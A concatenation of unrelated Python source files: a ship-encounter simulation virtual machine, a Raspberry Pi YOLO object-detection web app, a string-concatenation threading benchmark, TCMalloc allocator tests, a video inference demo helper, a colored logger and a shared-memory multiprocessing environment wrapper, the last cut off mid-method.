self.id = id # VMID
self.interval = interval
self.timeratio = timeratio
self.SimShipRegistered = []
self.__Times = 10
self.__RunFlag = 0 # 测试决策
self.__METFlag = 0 # 标识是否已经相遇,相遇则此虚拟机停止运行
self.__SimData = []
self.__NextStepData = {}
# 定义和启动VM线程
def GetNextStepData(self):
return self.__NextStepData
def SetShipStatus(self, StatusData):
"""
将ShipStatus 复原
"""
StatusData = copy.deepcopy(StatusData)
i = 0
for ship in self.SimShipRegistered:
ship.__init__(
StatusData[i].get('VMid'),
StatusData[i].get('shipid'),
StatusData[i].get('time'),
StatusData[i].get('lon'),
StatusData[i].get('lat'),
StatusData[i].get('speed'),
StatusData[i].get('heading'),
StatusData[i].get('interval')
)
i += 1
pass
def GetMetFlag(self):
return self.__METFlag
def GetSimData(self):
# time.sleep(0.1)
return self.__SimData
def addShip(self, ShipID, Tick = 0, Lon = 0.0, Lat = 0.0, Speed = 0.0, Heading = 0.0):
# 注册船舶
ship = SimShip(self.id, ShipID, Tick, Lon, Lat, Speed, Heading, self.timeratio)
self.SimShipRegistered.append(ship)
# SimShipRegistered.append(ship)
# def delShip(self, ship):
# # 移除注册船舶 By ship object
# self.SimShipRegistered.remove(ship)
# # SimShipRegistered.remove(ship)
# def delShip(self, shipid):
def delShip(self,):
# 移除注册船舶 By shipid
for ship in self.SimShipRegistered:
if ship.VMid == self.id:
self.SimShipRegistered.remove(ship)
# if ship.id == shipid:
# self.SimShipRegistered.remove(ship)
def RunOneTime(self, ):
for ship in self.SimShipRegistered:
ship.RunOneDecision(self.__RunFlag)
thisShipStatus = self.GetShipStatus()
# print("请注意下面进入决策引擎的数据和数量,正常情况列表中应该只有2条数据: ")
# print(thisShipStatus, '\n')
DeciResult = HA.ProbDeciEngie(thisShipStatus)
self.__SimData.append(self.GetShipStatus())
print("FLAG: ", DeciResult["FLAG"], "\n")
return DeciResult
def GetShipStatus(self):
# time.sleep(0.1)
foo = []
for ship in self.SimShipRegistered:
# for ship in SimShipRegistered:
# print(ship.GetShipStatus())
foo.append(ship.GetShipStatus())
return foo
pass
def StoreVOImgDataAndAddID2ShipStatus(self):
ShipStatus = self.GetShipStatus()
pos1 = [ShipStatus[0]['lon'], ShipStatus[0]['lat']]
heading1 = ShipStatus[0]['heading']
speed1 = ShipStatus[0]['speed']
pos2 = [ShipStatus[1]['lon'], ShipStatus[1]['lat']]
heading2 = ShipStatus[1]['heading']
speed2 = ShipStatus[1]['speed']
# imgID 由 '11'和36位的uuid拼接而成
imgID = '11' + str(uuid.uuid5(uuid.NAMESPACE_URL, str(time.time())))
b64ImgData = DrawVoAreas.GenVOImgB64(pos1, heading1, speed1, pos2, heading2, speed2, imgID)
# 将 b64压缩编码后的数据存入数据库,一次连接存储一条,有待优化
# TODO:有待优化数据库操作
# opt_db.insert_into_voimg(imgID, self.id, b64ImgData)
opt_redis.insert_into_voimg(imgID, self.id, b64ImgData)
return imgID
def RunMultiTime(self):
self.__GoHead = True
# self.__RunFlag = True # 测试决策
while self.__GoHead:
if self.__Times == 0:
self.__GoHead = False
if self.__Times > 0:
self.__Times = self.__Times - 1
if self.__GoHead:
# 调用上面的函数,存储图片数据,返回图片的ID
imgID = self.StoreVOImgDataAndAddID2ShipStatus()
# 目前只有主船决策,两艘船的VOImg 图一样,向每一艘船中添加VOImgID
# 更好的方案应该是...不,不是...>这玩意儿就应该在虚拟机层面操作.
for ship in self.SimShipRegistered:
ship.VOImgID = imgID # 向每一艘船中添加VOImgID
thisDeciResult = self.RunOneTime() # 更新之后的
self.__METFlag = thisDeciResult["MET"]
if self.__METFlag == 1:
self.Stop()
print("Attention:船已汇遇,当前虚拟机{}已经停止运行!\n".format(self.id))
else:
self.__RunFlag = thisDeciResult["FLAG"]
# self.__RunFlag, DeciProb = self.RunOneTime() # 原来的
if thisDeciResult["FLAG"] == 1:
self.Stop()
self.NextStep(thisDeciResult)
def NextStep(self, DeciProb):
"""
系统决策:给出每个概率对应的下一步结果,经过组装之后以
目前只有单船决策,即主船决策
NextStepData = {
"GoHead": {"prob": prob1, "status": ShipStatus1},
"TurnLeft": {"prob": prob2, "status": ShipStatus2},
"TurnRight": {"prob": prob3, "status": ShipStatus3}
}
的形式append到 self.__SimData 中,
传入参数格式:
DeciProb = {
"FLAG": FLAG,
"GoHead": GH,
"TurnLeft": TL,
"TurnRight": TR
}
其中GH, TL, TR均为概率数值,进入这里的FLAG 均为1,在这里已经没有用
"""
DeciProb = copy.deepcopy(DeciProb)
OldShipStatus = copy.deepcopy(self.GetShipStatus()) # ShipStatus
# print('\nOldShipData: ', OldShipStatus)
ShipStatus2 = self.RunNextStep(2)
# TurnLeft = {"probability": DeciProb.get("TurnLeft"), "status": ShipStatus2}
TurnLeft = {"probability": DeciProb.get("TurnLeft"), "status": OldShipStatus + ShipStatus2}
# print('\nTurnLeft: ', TurnLeft)
self.SetShipStatus(OldShipStatus)
ShipStatus1 = self.RunNextStep(1)
# GoHead = {"probability": DeciProb["GoHead"], "status": ShipStatus1}
GoHead = {"probability": DeciProb["GoHead"], "status": OldShipStatus + ShipStatus1}
# print('Prob: ', DeciProb["GoHead"])
# print('\nGoHead: ', GoHead)
self.SetShipStatus(OldShipStatus) # 将shipStatus 复原
ShipStatus3 = self.RunNextStep(3)
# TurnRight = {"probability": DeciProb.get("TurnRight"), "status": ShipStatus3}
TurnRight = {"probability": DeciProb.get("TurnRight"), "status": OldShipStatus + ShipStatus3}
# print('\nTurnRight: ', TurnRight)
self.SetShipStatus(OldShipStatus)
# print('\nAfterTurnRight ShipStatus: ', self.GetShipStatus())
NextStepData = {
"TurnLeft": TurnLeft,
"GoHead": GoHead,
"TurnRight": TurnRight
}
self.__NextStepData = copy.deepcopy(NextStepData)
pass
def RunNextStep(self, tempflag):
"""
在功能上与RunOneTime相似,但又与之不同,单独作用一次,独立计算每种情况下的下一步的状态
"""
# ship1 = self.SimShipRegistered[0]
# ship2 = self.SimShipRegistered[1]
for ship in self.SimShipRegistered:
ship.RunOneDecision(tempflag)
SomeShipStatus = self.GetShipStatus()
# print('\nThis SomeShipStatus: ', SomeShipStatus)
return SomeShipStatus
pass
def Run(self, initStatus4DrawLines, Times = 0):
self.__SimData.append(initStatus4DrawLines) # 先将上一次仿真的结束状态添加到状态列表
# 调用上面的函数,存储图片数据,返回图片的ID
iimgID = self.StoreVOImgDataAndAddID2ShipStatus()
# 目前只有主船决策,两艘船的VOImg 图一样,向每一艘船中添加VOImgID
# 更好的方案应该是...不,不是...>这玩意儿就应该在虚拟机层面操作.
for ship in self.SimShipRegistered:
ship.VOImgID = iimgID # 向每一艘船中添加VOImgID
self.__SimData.append(self.GetShipStatus()) # 再将当前的起始状态添加到状态列表
# 启动线程
self.__Times = Times
self.__VMThread = threading.Thread(target=self.RunMultiTime(), args=(self,))
self.__VMThread.start()
# 这里改为单线程测试
# self.RunMultiTime()
def Stop(self):
self.__GoHead = False
# self.delShip()
pass
# 这个函数用于外部调用
def RunVM(initData, initStatus4DrawLines, interval = 0.2, timeRatio = 100, runTimes = -1):
"""
: initData: data that init ships in this VM, and initData looks like :
initData = {
ship0: {
ShipID: "10086",
Tick: 0,
Lon: 123,
Lat: 35,
Speed: 10,
Heading: 90
},
ship1: {ShipID: "10010", Tick: 0, Lon: 123.1, Lat: 35.01, Speed: 7, Heading: 90}
}
: interval = 0.2,
: timeRatio = 100,
: runTimes = -1 : running times, -1 to loop,
: return: VMData
"""
GenVMID = time.strftime("%y%m%d%H%M%S") + str(random.randint(1000, 9999))
print("VMID: ", GenVMID)
VM = SimVM(id = GenVMID, interval = interval, timeratio = timeRatio)
VM.addShip(
ShipID = initData["ship0"]["ShipID"],
Tick = initData["ship0"]["Tick"],
Lon = initData["ship0"]["Lon"],
Lat = initData["ship0"]["Lat"],
Speed = initData["ship0"]["Speed"],
Heading = initData["ship0"]["Heading"]
) # 主船
VM.addShip(ShipID = initData["ship1"]["ShipID"], Tick = initData["ship1"]["Tick"], Lon = initData["ship1"]["Lon"], Lat = initData["ship1"]["Lat"], Speed = initData["ship1"]["Speed"], Heading = initData["ship1"]["Heading"]) # 目标船,客船
VM.Run(initStatus4DrawLines, runTimes)
# VMData = {"VMID": VM.id, "SimData": VM.GetSimData(), "NextStepData": VM.GetNextStepData(), "MET": VM.GetMetFlag()}
# print('\nVMData: ', VMData)
# return VMData
return VM
# 这个函数用于内部测试
def SimTest():
GenVMID = time.strftime("%y%m%d%H%M%S") + str(random.randint(1000, 9999))
print("VMID: ", GenVMID)
VM = SimVM(id = GenVMID, interval = 0.2, timeratio = 100)
VM.addShip(ShipID='10086', Lon=123, Lat=35.01, Speed=10, Heading=135) # 主船
VM.addShip(ShipID='10010', Lon=123.1, Lat=35, Speed=7, Heading=270) # 目标船,客船
VM.Run(8)
VMData = {"VMID": VM.id, "SimData": VM.GetSimData(), "NextStepData": VM.GetNextStepData(), "MET": VM.GetMetFlag()}
print('\nVMData: ', VMData)
# ShipStatus内存数据表,一台VM带一个
# SimItemRegistered = []
# SimShipRegistered = []
# class SimItem(object):
# # 仿真实体基础类,实现注册和注销
# def __init__(self, RegisteredList = SimItemRegistered):
# __RegisterList = RegisteredList
# def Register():
# __RegisterList.append(self)
# pass
# def unRegister():
# __RegisterList.remove(self)
# pass
# def RunOneDecision():
# pass
# def main():
# SimTest()
# pass
# if __name__ == '__main__':
# main()
|
object_detection_app.py
|
import os,os.path,time,cv2,argparse,multiprocessing,threading,asyncio
import numpy as np
import tornado.ioloop
import tornado.web
import tornado.autoreload
from mvnc import mvncapi as mvnc
from skimage.transform import resize
from utils.app_utils import FPS, WebcamVideoStream
from multiprocessing import Queue, Pool
from picamera import PiCamera
classes = ["aeroplane", "bicycle", "bird", "boat", "bottle", "bus", "car", "cat", "chair", "cow", "diningtable", "dog", "horse", "motorbike", "person", "pottedplant", "sheep", "sofa", "train","tvmonitor"]
dim=(448,448)
threshold = 0.2
iou_threshold = 0.5
num_class = 20
num_box = 2
grid_size = 7
#Declaration for custom frame.png saving
path = '/home/pi/workspace/ncsdk/examples/apps/yoloNCS/py_examples/Tornado/templates/static'
#Following lines for Tornado Websocket
#Write to screen
class MainHandler(tornado.web.RequestHandler):
def get(self):
self.render('templates/static/index.html')
#This tells Tornado where to find static file
settings = dict(
template_path = os.path.join(os.path.dirname(__file__), "Tornado"),
static_path = os.path.join(os.path.dirname(__file__), "Tornado/templates/static"),
debug = True
)
# r"/" == root websit address
def start_tornado(*args, **kwargs):
asyncio.set_event_loop(asyncio.new_event_loop())
application = tornado.web.Application([
(r"/", MainHandler),
(r'/static/(.*)', tornado.web.StaticFileHandler, {'path': 'static/'})
], **settings, gzip = True)
application.listen(7777)
print("Launching Tornado")
tornado.ioloop.IOLoop.instance().start()
print("Launch Completed\n")
def show_results(img, results, img_width, img_height):
img_cp = img
disp_console = False
imshow = True
for i in range(len(results)):
x = int(results[i][1])
y = int(results[i][2])
w = int(results[i][3])//2
h = int(results[i][4])//2
if disp_console : print (' class : ' + results[i][0] + ' , [x,y,w,h]=[' + str(x) + ',' + str(y) + ',' + str(int(results[i][3])) + ',' + str(int(results[i][4]))+'], Confidence = ' + str(results[i][5]) )
xmin = x-w
xmax = x+w
ymin = y-h
ymax = y+h
if xmin<0:
xmin = 0
if ymin<0:
ymin = 0
if xmax>img_width:
xmax = img_width
if ymax>img_height:
ymax = img_height
if imshow:
cv2.rectangle(img_cp,(xmin,ymin),(xmax,ymax),(0,255,0),2)
#print ((xmin, ymin, xmax, ymax))
cv2.rectangle(img_cp,(xmin,ymin-20),(xmax,ymin),(125,125,125),-1)
cv2.putText(img_cp,results[i][0] + ' : %.2f' % results[i][5],(xmin+5,ymin-7),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,0,0),1)
#
cv2.imshow('YOLO detection',img_cp)
def interpret_output(output, img_width, img_height):
w_img = img_width
h_img = img_height
probs = np.zeros((7,7,2,20))
class_probs = (np.reshape(output[0:980],(7,7,20)))
#print(class_probs)
scales = (np.reshape(output[980:1078],(7,7,2)))
#print(scales)
boxes = (np.reshape(output[1078:],(7,7,2,4)))
offset = np.transpose(np.reshape(np.array([np.arange(7)]*14),(2,7,7)),(1,2,0))
#boxes.setflags(write=1)
boxes[:,:,:,0] += offset
boxes[:,:,:,1] += np.transpose(offset,(1,0,2))
boxes[:,:,:,0:2] = boxes[:,:,:,0:2] / 7.0
boxes[:,:,:,2] = np.multiply(boxes[:,:,:,2],boxes[:,:,:,2])
boxes[:,:,:,3] = np.multiply(boxes[:,:,:,3],boxes[:,:,:,3])
boxes[:,:,:,0] *= w_img
boxes[:,:,:,1] *= h_img
boxes[:,:,:,2] *= w_img
boxes[:,:,:,3] *= h_img
for i in range(2):
for j in range(20):
probs[:,:,i,j] = np.multiply(class_probs[:,:,j],scales[:,:,i])
#print (probs)
filter_mat_probs = np.array(probs>=threshold,dtype='bool')
filter_mat_boxes = np.nonzero(filter_mat_probs)
boxes_filtered = boxes[filter_mat_boxes[0],filter_mat_boxes[1],filter_mat_boxes[2]]
probs_filtered = probs[filter_mat_probs]
classes_num_filtered = np.argmax(probs,axis=3)[filter_mat_boxes[0],filter_mat_boxes[1],filter_mat_boxes[2]]
argsort = np.array(np.argsort(probs_filtered))[::-1]
boxes_filtered = boxes_filtered[argsort]
probs_filtered = probs_filtered[argsort]
classes_num_filtered = classes_num_filtered[argsort]
for i in range(len(boxes_filtered)):
if probs_filtered[i] == 0 : continue
for j in range(i+1,len(boxes_filtered)):
if iou(boxes_filtered[i],boxes_filtered[j]) > iou_threshold :
probs_filtered[j] = 0.0
filter_iou = np.array(probs_filtered>0.0,dtype='bool')
boxes_filtered = boxes_filtered[filter_iou]
probs_filtered = probs_filtered[filter_iou]
classes_num_filtered = classes_num_filtered[filter_iou]
result = []
for i in range(len(boxes_filtered)):
result.append([classes[classes_num_filtered[i]],boxes_filtered[i][0],boxes_filtered[i][1],boxes_filtered[i][2],boxes_filtered[i][3],probs_filtered[i]])
return result
def iou(box1,box2):
tb = min(box1[0]+0.5*box1[2],box2[0]+0.5*box2[2])-max(box1[0]-0.5*box1[2],box2[0]-0.5*box2[2])
lr = min(box1[1]+0.5*box1[3],box2[1]+0.5*box2[3])-max(box1[1]-0.5*box1[3],box2[1]-0.5*box2[3])
if tb < 0 or lr < 0 : intersection = 0
else : intersection = tb*lr
return intersection / (box1[2]*box1[3] + box2[2]*box2[3] - intersection)
def worker(graph, input_q, output_q):
fps = FPS().start()
while True:
fps.update()
frame = input_q.get()
graph.LoadTensor(resize(frame/255.0,dim,1)[:,:,(2,1,0)].astype(np.float16), 'user object')
out, userobj = graph.GetResult()
results = interpret_output(out.astype(np.float32), frame.shape[1], frame.shape[0])
#print(results)
try:
if results[0][0] == "car" or results[0][0] == "person" or results[0][0] == "aeroplane" or results[0][0] == "bottle":
print("Object detected! Attempting to capture image...")
try:
#Capture a frame and save it as png file
cv2.imwrite(os.path.join(path, 'frame.png'), frame)
print("Image captured!\n")
except:
print("Image capture FAILED!\n")
except:
print("NO RESULTS\n")
output_q.put((frame, results, frame.shape[1], frame.shape[0]))
#output_q.put((frame, [], frame.shape[1], frame.shape[0]))
#output_q.put(frame)
#
fps.stop()
if __name__ == '__main__':
#Starting a new thread for WebSocket
t = threading.Thread(target=start_tornado)
t.daemon = True
#Start server at port 7777
print(r'Server Running at http://localhost:' + "7777" + r'/')
print(r'To close press ctrl + c')
tornado.autoreload.start()
for dir, _, files in os.walk('static'):
[tornado.autoreload.watch(dir + '/' + f) for f in files if not f.startswith('.')]
t.start()
time.sleep(3)
parser = argparse.ArgumentParser()
parser.add_argument('-src', '--source', dest='video_source', type=int,
default=0, help='Device index of the camera.')
parser.add_argument('-wd', '--width', dest='width', type=int,
default=800, help='Width of the frames in the video stream.')
parser.add_argument('-ht', '--height', dest='height', type=int,
default=600, help='Height of the frames in the video stream.')
parser.add_argument('-num-w', '--num-workers', dest='num_workers', type=int,
default=2, help='Number of workers.')
parser.add_argument('-q-size', '--queue-size', dest='queue_size', type=int,
default=5, help='Size of the queue.')
args = parser.parse_args()
logger = multiprocessing.log_to_stderr()
logger.setLevel(multiprocessing.SUBDEBUG)
input_q = Queue(maxsize=args.queue_size)
output_q = Queue(maxsize=args.queue_size)
# configuration NCS
network_blob = 'graph'
mvnc.SetGlobalOption(mvnc.GlobalOption.LOG_LEVEL, 2)
devices = mvnc.EnumerateDevices()
if len(devices) == 0:
print('No devices found')
quit()
device = mvnc.Device(devices[0])
device.OpenDevice()
opt = device.GetDeviceOption(mvnc.DeviceOption.OPTIMISATION_LIST)
# load blob
with open(network_blob, mode='rb') as f:
blob = f.read()
graph = device.AllocateGraph(blob)
graph.SetGraphOption(mvnc.GraphOption.ITERATIONS, 1)
iterations = graph.GetGraphOption(mvnc.GraphOption.ITERATIONS)
#
pool = Pool(args.num_workers, worker, (graph, input_q, output_q))
#
video_capture = WebcamVideoStream(src=args.video_source,
width=args.width,
height=args.height).start()
fps = FPS().start()
#
while True: # fps._numFrames < 120
frame = video_capture.read()
input_q.put(frame)
t = time.time()
(img, results, img_width, img_height) = output_q.get()
show_results(img, results, img_width, img_height)
#cv2.imshow('Video', output_q.get())
#cv2.imshow('Video', output_q.get())
fps.update()
fps.stop()
print('[INFO] elapsed time: {:.2f}'.format(time.time() - t))
print('[INFO] fps.elapsed: {:.2f}'.format(fps.elapsed()))
print('[INFO] FPS: {:.2f}'.format(fps.fps()))
if cv2.waitKey(1) & 0xFF == ord('q'):
break
fps.stop()
print('[INFO] elapsed time (total): {:.2f}'.format(fps.elapsed()))
print('[INFO] approx. FPS: {:.2f}'.format(fps.fps()))
pool.terminate()
video_capture.stop()
cv2.destroyAllWindows()
graph.DeallocateGraph()
device.CloseDevice()
|
benchmark03_string_operations.py
|
#!/usr/bin/python
import os
import threading
import time
from multiprocessing import Pool
NUM_ITERATIONS = 200000
NUM_TASKS = 50
my_list = []
def prepare_data():
for c in xrange(0x30, 0x79, 3):
my_list.append(chr(c) + chr(c+1) + chr(c+2))
def my_function1(index, out_value):
result = []
for counter in xrange(0, NUM_ITERATIONS):
output_item = ''
for item in my_list:
output_item += item
result.append(output_item)
out_value[index] = result
def my_function2():
result = []
for counter in xrange(0, NUM_ITERATIONS):
output_item = ''
for item in my_list:
output_item += item
result.append(output_item)
return result
def my_function3(index, out_value):
result = []
for counter in xrange(0, NUM_ITERATIONS):
result.append(''.join(my_list))
out_value[index] = result
def my_function4():
result = []
for counter in xrange(0, NUM_ITERATIONS):
result.append(''.join(my_list))
return result
if __name__ == '__main__':
print ("Running: %s" % os.path.basename(__file__))
prepare_data()
results = {}
jobs = [threading.Thread(target=my_function1, kwargs=dict(index=i, out_value=results))
for i in xrange(NUM_TASKS)]
start_time = time.time()
[t.start() for t in jobs]
[t.join() for t in jobs]
end_time = time.time()
execution_time = end_time - start_time
print ("Execution time(concatenation using threading): %f\n" % execution_time)
# print ("Output: %s\n" % results.values())
del results
pool = Pool(processes=4)
start_time = time.time()
results = [pool.apply_async(my_function2) for p in xrange(NUM_TASKS)]
pool.close()
pool.join()
end_time = time.time()
execution_time = end_time - start_time
print ("Execution time(concatenation using multiprocessing.Pool): %f\n" % execution_time)
# print ("Output: %s\n" % [x.get() for x in results])
results = {}
jobs = [threading.Thread(target=my_function3, kwargs=dict(index=i, out_value=results))
for i in xrange(NUM_TASKS)]
start_time = time.time()
[t.start() for t in jobs]
[t.join() for t in jobs]
end_time = time.time()
execution_time = end_time - start_time
print ("Execution time(string joining using threading): %f\n" % execution_time)
# print ("Output: %s\n" % results.values())
del results
pool = Pool(processes=4)
start_time = time.time()
results = [pool.apply_async(my_function4) for p in xrange(NUM_TASKS)]
pool.close()
pool.join()
end_time = time.time()
execution_time = end_time - start_time
print ("Execution time(string joining using multiprocessing.Pool): %f\n" % execution_time)
# print ("Output: %s\n" % [x.get() for x in results])
|
TCMalloc_test.py
|
# Copyright 2015 Ufora Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import ufora.native.TCMalloc as TCMallocNative
import threading
import Queue
def memoryFreeingThreadLoop(queue):
while True:
element = queue.get()
if element == "exit":
return
address, event = element
TCMallocNative.freeAtAddress(address)
event.set()
class ComponentModelTest(unittest.TestCase):
def test_allocInOneThreadAndDeallocateInAnother(self):
queue = Queue.Queue()
thread = threading.Thread(target=memoryFreeingThreadLoop, args=(queue,))
thread.start()
#allocate 100 GB and free in the other thread
for ix in range(1000):
event = threading.Event()
address = TCMallocNative.mallocAndReturnAddress(100 * 1024 * 1024)
queue.put((address, event))
event.wait()
queue.put("exit")
thread.join()
def test_realloc(self):
#verify that TCMalloc accounts for resizing correctly
measurements = [TCMallocNative.getBytesUsed()]
for ix in range(10):
addr = TCMallocNative.mallocAndReturnAddress(10 * 1024 * 1024)
addr = TCMallocNative.reallocAtAddress(addr, 20 * 1024 * 1024)
measurements.append(TCMallocNative.getBytesUsed())
addr = TCMallocNative.reallocAtAddress(addr, 10 * 1024 * 1024)
addr = TCMallocNative.reallocAtAddress(addr, 5 * 1024 * 1024)
TCMallocNative.freeAtAddress(addr)
measurements.append(TCMallocNative.getBytesUsed())
self.assertTrue(
measurements[-1] < measurements[0] + 10 * 1024 * 1024,
"Expected %s to be less than 10 MB larger than %s" % (measurements[-1], measurements[0])
)
def test_strings(self):
bytes = TCMallocNative.getBytesUsed()
for ix in range(100):
s = str(ix) * 1000000
s2 = TCMallocNative.returnStringArg(s)
self.assertEqual(s, s2)
finalBytes = TCMallocNative.getBytesUsed()
self.assertTrue(finalBytes < bytes + 10000000)
|
demo.py
|
# -*- coding: utf-8 -*-
# Copyright 2018 The Blueoil Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
from __future__ import absolute_import, division, print_function, unicode_literals
import time
from itertools import product as itr_prod
from threading import Thread
import cv2
import numpy as np
# HACK: cross py2-py3 compatible version
try:
from queue import Queue
except ImportError:
from Queue import Queue
COLORS = [tuple(p) for p in itr_prod([0, 180, 255], repeat=3)]
COLORS = COLORS[1:]
def ltwh_to__tblr(ltwh):
l, t, w, h = ltwh.tolist()
b = int(t + h)
r = int(l + w)
return t, b, l, r
def add_fps(orig, fps):
f_p_s_text = "FPS: {:.1f}".format(fps)
text_color = (255, 144, 30)
orig_h, orig_w = orig.shape[:2]
cv2.putText(orig, f_p_s_text, (10, orig_h - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, text_color, 1)
return orig
def check_range(upper, lower, checked_val):
if upper < checked_val:
checked_val = upper
elif lower > checked_val:
checked_val = lower
return checked_val
def add_rectangle(classes, orig, preds, pred_shape):
orig_h, orig_w = orig.shape[:2]
locs = [pred[:, 0:4] for pred in preds]
labels_n = np.array([pred[:, 4] for pred in preds]).astype(np.int) # TODO magic-number
labels_n = labels_n.flatten()
labels = [classes[i_label] for i_label in labels_n]
scores = preds[0][:, 5]
pred_h, pred_w = pred_shape
w_scale = orig_w / pred_w
h_scale = orig_h / pred_h
locs = (np.array(locs).reshape((-1, 4)) * [w_scale, h_scale, w_scale, h_scale]).astype(int)
for idx, loc in enumerate(locs):
t, b, le, r = ltwh_to__tblr(loc)
le = check_range(orig_w, 0, le)
r = check_range(orig_w, 0, r)
t = check_range(orig_h, 0, t)
b = check_range(orig_h, 0, b)
color_r = COLORS[labels_n[idx] % len(COLORS)]
thick = 2
label_text = "{} : {:.1f}%".format(labels[idx], scores[idx] * 100)
label_size, baseline = cv2.getTextSize(label_text, cv2.FONT_HERSHEY_SIMPLEX, 0.5, 1)
cv2.rectangle(orig, (le, t), (r, b), color_r, thick)
max_color = max(color_r)
text_color = (255, 255, 255) if max_color < 255 else (0, 0, 0)
cv2_filed_config = cv2.cv.CV_FILLED if hasattr(cv2, 'cv') else cv2.FILLED
cv2.rectangle(orig, (le, t), (le + label_size[0], t + label_size[1]), color_r, cv2_filed_config)
cv2.putText(orig, label_text, (le, t + label_size[1]), cv2.FONT_HERSHEY_SIMPLEX, 0.5, text_color)
return orig
class VideoStream:
def __init__(self, video_source, video_width, video_height, video_fps, queue_size=1):
self.video_fps = video_fps
vc = cv2.VideoCapture(video_source)
if hasattr(cv2, 'cv'):
vc.set(cv2.cv.CV_CAP_PROP_FRAME_WIDTH, video_width)
vc.set(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT, video_height)
vc.set(cv2.cv.CV_CAP_PROP_FPS, video_fps)
else:
vc.set(cv2.CAP_PROP_FRAME_WIDTH, video_width)
vc.set(cv2.CAP_PROP_FRAME_HEIGHT, video_height)
vc.set(cv2.CAP_PROP_FPS, video_fps)
self.stream = vc
self.stopped = False
self.queue = Queue(maxsize=queue_size)
self.thread = Thread(target=self.update, args=())
self.thread.daemon = True
self.thread.start()
def update(self):
while True:
if self.stopped:
break
(flg, frame) = self.stream.read()
if not flg:
Exception("Video capture is wrong")
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
if self.queue.full():
time.sleep(1/float(self.video_fps))
else:
if not self.queue.empty():
self.queue.get()
self.queue.put(frame)
else:
self.queue.put(frame)
self.stream.release()
def read(self):
return self.queue.get()
def release(self):
self.stopped = True
self.thread.join()
def run_inference(image, nn, pre_process, post_process):
start = time.clock()
data = pre_process(image=image)["image"]
data = np.expand_dims(data, axis=0)
network_only_start = time.clock()
result = nn.run(data)
fps_only_network = 1.0/(time.clock() - network_only_start)
output = post_process(outputs=result)['outputs']
fps = 1.0/(time.clock() - start)
return output, fps, fps_only_network
|
log.py
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import contextlib
import copy
import functools
import logging
import os
import sys
import threading
import time
from typing import List
import colorlog
from colorama import Fore
loggers = {}
log_config = {
'DEBUG': {
'level': 10,
'color': 'purple'
},
'INFO': {
'level': 20,
'color': 'green'
},
'TRAIN': {
'level': 21,
'color': 'cyan'
},
'EVAL': {
'level': 22,
'color': 'blue'
},
'WARNING': {
'level': 30,
'color': 'yellow'
},
'ERROR': {
'level': 40,
'color': 'red'
},
'CRITICAL': {
'level': 50,
'color': 'bold_red'
}
}
class Logger(object):
'''
Deafult logger in PaddleAudio
Args:
name(str) : Logger name, default is 'PaddleAudio'
'''
def __init__(self, name: str = None):
name = 'PaddleAudio' if not name else name
self.logger = logging.getLogger(name)
for key, conf in log_config.items():
logging.addLevelName(conf['level'], key)
self.__dict__[key] = functools.partial(self.__call__, conf['level'])
self.__dict__[key.lower()] = functools.partial(
self.__call__, conf['level'])
self.format = colorlog.ColoredFormatter(
'%(log_color)s[%(asctime)-15s] [%(levelname)s]%(reset)s - %(message)s',
log_colors={key: conf['color']
for key, conf in log_config.items()})
self.handler = logging.StreamHandler()
self.handler.setFormatter(self.format)
self.logger.addHandler(self.handler)
self.logLevel = 'DEBUG'
self.logger.setLevel(logging.DEBUG)
self.logger.propagate = False
self._is_enable = True
def disable(self):
self._is_enable = False
def enable(self):
self._is_enable = True
@property
def is_enable(self) -> bool:
return self._is_enable
def __call__(self, log_level: str, msg: str):
if not self.is_enable:
return
self.logger.log(log_level, msg)
@contextlib.contextmanager
def use_terminator(self, terminator: str):
old_terminator = self.handler.terminator
self.handler.terminator = terminator
yield
self.handler.terminator = old_terminator
@contextlib.contextmanager
def processing(self, msg: str, interval: float = 0.1):
'''
Continuously print a progress bar with rotating special effects.
Args:
msg(str): Message to be printed.
interval(float): Rotation interval. Default to 0.1.
'''
end = False
def _printer():
index = 0
flags = ['\\', '|', '/', '-']
while not end:
flag = flags[index % len(flags)]
with self.use_terminator('\r'):
self.info('{}: {}'.format(msg, flag))
time.sleep(interval)
index += 1
t = threading.Thread(target=_printer)
t.start()
yield
end = True
logger = Logger()
|
shm_multiproc.py
|
import ctypes
import numpy as np
from multiprocessing import Pipe, Process
from multiprocessing.sharedctypes import RawArray
from . import Env, Space
START, STEP, RESET, STOP, DONE = range(5)
class ShmProcEnv(Env):
def __init__(self, env, idx, shm):
super().__init__(env.id)
self._env, self.idx, self.shm = env, idx, shm
self.conn = self.w_conn = self.proc = None
def start(self):
self.conn, self.w_conn = Pipe()
self.proc = Process(target=self._run)
self.proc.start()
self.conn.send((START, None))
def step(self, act):
self.conn.send((STEP, act))
def reset(self):
self.conn.send((RESET, None))
def stop(self):
self.conn.send((STOP, None))
def wait(self):
return self.conn.recv()
def obs_spec(self):
return self._env.obs_spec()
def act_spec(self):
return self._env.act_spec()
def _run(self):
while True:
msg, data = self.w_conn.recv()
if msg == START:
self._env.start()
self.w_conn.send(DONE)
elif msg == STEP:
obs, rew, done = self._env.step(data)
for shm, ob in zip(self.shm, obs + [rew, done]):
np.copyto(dst=shm[self.idx], src=ob)
self.w_conn.send(DONE)
elif msg == RESET:
obs = self._env.reset()
